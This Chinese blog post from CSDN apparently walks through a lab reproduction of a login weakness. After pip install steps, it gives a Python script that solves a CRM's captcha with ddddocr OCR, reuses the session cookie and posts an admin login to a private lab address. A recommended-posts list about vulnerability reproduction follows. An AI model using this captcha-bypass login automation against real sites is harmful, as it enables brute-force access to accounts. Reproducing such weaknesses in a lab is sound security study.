Python登录漏洞复现

最新推荐文章于 2024-10-12 12:26:23 发布
最新推荐文章于 2024-10-12 12:26:23 发布
阅读量804 收藏 1
点赞数 4
分类专栏: python测试开发 网络安全 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhuge_long/article/details/139352777
版权

Python登录漏洞复现

3.1 环境准备

1)升级pip

pip install --upgrade pip -i https://pypi.tuna.tsinghua.edu.cn/simple

2)安装ddddocr图形识别库

pip install ddddocr -i https://pypi.tuna.tsinghua.edu.cn/simple

3)安装requests网络请求库

pip install requests -i https://pypi.tuna.tsinghua.edu.cn/simple

4)安装辅助命令

pip uninstall -y Pillow
pip install Pillow==9.5.0 -i https://pypi.tuna.tsinghua.edu.cn/simple

3.2 python识别验证码

# 注意:验证码的session需要与登录的session一致,不然不匹配
import ddddocr
import requests

# 1)创建ocr连接对象
ocr = ddddocr.DdddOcr()

# 2)获取图片内容
resp = requests.get("http://192.168.190.133/crm/php/verifyCode.php")
image = resp.content

# 3)获取sessionId
cookie = resp.headers['Set-Cookie'].split(";")[0]

# 4)获取验证码
str = ocr.classification(image)

# 5)发送登录请求时,添加请求头,将PHPSESSID放到请求头中
head={'Cookie':cookie}
url = "http://192.168.190.133/crm/php/login.php?username=admin&password=123456&code="+str
data = {"account":"admin","password":"123456","authcode":str}
resps = requests.post(url,headers=head,data=data)
print(resps.text)

蜗牛学苑_武汉
关注
专栏目录
python 验证漏洞_Python开发人员应该害怕的十大安全漏洞
weixin_26722031的博客
08-31 761
python 验证漏洞Writing a safe and secure code is difficult. When developing software, you often concentrate on how it should be applied. But in the context of security, the first thing to think about is h...
python验证漏洞编号正则
ellija的博客
09-14 1251
python验证漏洞编号正则
weblogic反序列化漏洞验证脚本(python版)对4.18最新漏洞检测
05-11
对weblogic最新漏洞的检测,自己已经测试,可以使用,在使用之前系统要安装python和修改py文件中的ip和weblogic端口
拒绝做工具小子—编写Python漏洞验证脚本
kali_Ma的博客
02-09 8210
前言 我们实战经常会遇到以下几个问题: ​ 1、遇到一个利用步骤十分繁琐的漏洞,中间错一步就无法利用 ​ 2、挖到一个通用漏洞,想要批量刷洞小赚一波,但手动去测试每个网站工作量太大 这个时候编写一个poc脚本将会将会减轻我们很多工作。本文将以编写一个高效通用的poc脚本为目的,学习一些必要的python知识,这周也是拒绝做工具小子努力学习的一周 requests模块使用技巧 Requests是Python中一个常用的HTTP请求库,使用Requests库来发起网络请求非常简单,具体的使用方法这里就不多介绍了
python爬取cnvd漏洞库信息
黑面狐
12-29 9455
今天一同事需要整理http://ics.cnvd.org.cn/工控漏洞库里面的信息,一看960多个要整理到什么时候才结束。 所以我决定写个爬虫帮他抓取数据。 看了一下各类信息还是很规则的,感觉应该很好写。 but这个网站设置了各种反爬虫手段。 经过各种百度,还是解决问题了。 设计思路: 1.先抓取每一个漏洞信息对应的网页url 2.获取每个页面的漏洞信息 # -*- coding
Python unpickle 命令执行漏洞复现总结
weixin_44283446的博客
03-29 5788
Python unpickle 命令执行漏洞复现总结漏洞原理环境说明漏洞复现 仅做学习参考使用。 漏洞原理 pickle/cPickle是python序列化存储对象的一个工具,就像php反序列化存在漏洞python序列化对象被反序列化后也很有可能执行其中的恶意代码,导致任意代码执行。pickle允许任意一个对象去定义一个__reduce__方法来声明怎么去序列化这个对象。这个方法返回一个字符串或者元组来描述当反序列化的时候该如何重构,可以把恶意代码写到__reduce__的返回中就可以构造出恶意的文
Tomcat常见漏洞复现
m0_59151303的博客
08-06 866
tomcat是一个开源而且免费的jsp服务器,默认端口:8080,属于轻量级应用服务器。它可以实现JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。在历史上也披露出来了很多的漏洞,这里我们讲几个经典的漏洞复现
【Jboss】常见漏洞复现
m0_59151303的博客
08-06 1183
JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
python 注入漏洞复现
07-27
下面是一个简单的 Python 代码示例,演示了 SQL 注入的复现过程: ```python import pymysql # 连接数据库 conn = pymysql.connect(host='localhost', user='root', password='password', db='mydb') cursor = ...
WordPress Plugin - WPdiscuz 7.0.4 任意文件上传漏洞和poc,python脚本,复现所需软件安装
01-01
WordPress Plugin - WPdiscuz 7.0.4 任意文件上传漏洞和poc,python脚本,复现所需软件安装包wordpress-5.4.1-zh_CN.tar.gz,phpStudy_64_v8.1.1.3.zip,phpStudy-1_v8.1.0.3.zip,wpdiscuz.7.0.4-1670423032410.zip
基于Python的容器逃逸漏洞快速复现及多语言兼容设计源码
10-03
该项目为基于Python的容器逃逸漏洞快速复现工具,源码包含572个文件,涵盖Python、PHP、C、Shell、HTML、JavaScript等多种语言。文件类型多样,主要包括443个YAML配置文件,31个Python脚本文件,26个Markdown文档,...
MS15-034漏洞复现python编写对应POC脚本
weixin_49340699的博客
07-29 1436
MS15-034漏洞复现python编写对应POC脚本环境搭建编写python漏洞检测脚本总结 环境搭建 首先我们到官网查看对应漏洞的信息https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034 可以得知该漏洞适用于很多环境我们这里就用win7来构建靶机环境 在win7安装ISS 勾选上图上两项 然后就开始安装了等待几分钟后(可能要重启) 验证安装成功否打开浏览器访问127.0.0.1 如图则安装
【人工智能学习之PaddleOCR快速上手】
最新发布
Jiagym的博客
10-12 1087
在配置文件中,可以设置组建模型、优化器、损失函数、模型前后处理的参数,PaddleOCR从配置文件中读取到这些参数,进而组建出完整的训练流程,完成模型训练,在需要对模型进行优化的时,可以通过修改配置文件中的参数完成配置,使用简单且方便修改。而 L2 正则化中,添加正则化项的目的在于减少参数平方的总和。准确检测的标准是检测框与标注框的IOU大于某个阈值,正确识别的检测框中的文本与标注的文本相同。如果缺少带标注的数据,或者不想投入研发成本,建议直接调用开放的API,开放的API覆盖了目前比较常见的一些垂类。
python中zip()与zip(*)的用法解析
m0_51579041的博客
10-08 304
zip()与zip(*)的用法解析
gligen安装部署笔记
jacke121的专栏
10-08 294
gligen安装部署笔记
文本区域分割系统源码&数据集分享
lzmlzm89的博客
10-08 1383
数据集信息展示在现代计算机视觉领域,文本区域分割的研究日益受到重视,尤其是在处理文档图像和名片等场景时。为此,我们构建了一个名为“more2”的数据集,旨在为改进YOLOv8-seg模型提供丰富的训练素材,以提升其在文本区域分割任务中的表现。该数据集包含五个类别,具体包括“0”、“2”、“business-name-card”、“doc”和“wendang”,每个类别均具有独特的特征和应用场景,能够为模型的训练提供多样化的样本。
python安装第三方库的问题与解决方法
WANGWUSAN66的博客
10-10 771
大部分第三方库都是在国外网站,如果直接使用pip install 包名,下载速度会很慢,这对一些大型包是很致命的,如果下载中断则需要重头再来。安装某些包时,进行到一半出现构建wheel错误,这可能由于某些神秘的原因造成的,非常让人恼火。有些包(如rasterstats)既不能通过pip安装,在2中的网站也找不到,该怎么办?在python第三方库综合网站上搜索这个包,手动下载whl文件,下载完成后使用。解决方案:使用国内镜像(如清华镜像下载),速度很容易达到1M以上;
RWKV-CHN模型部署教程
SJJS_1的博客
10-10 1165
RWKV-x060-World-7B-v2.1-20240507-ctx4096 一号空间,RWKV 语言模型旨在通过为自动化所有事情来消除使用大型语言模型的障碍。用户所需要的就是一个只有几兆字节的轻量级可执行程序。本文将详细介绍如何实现该模型的本地部署。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值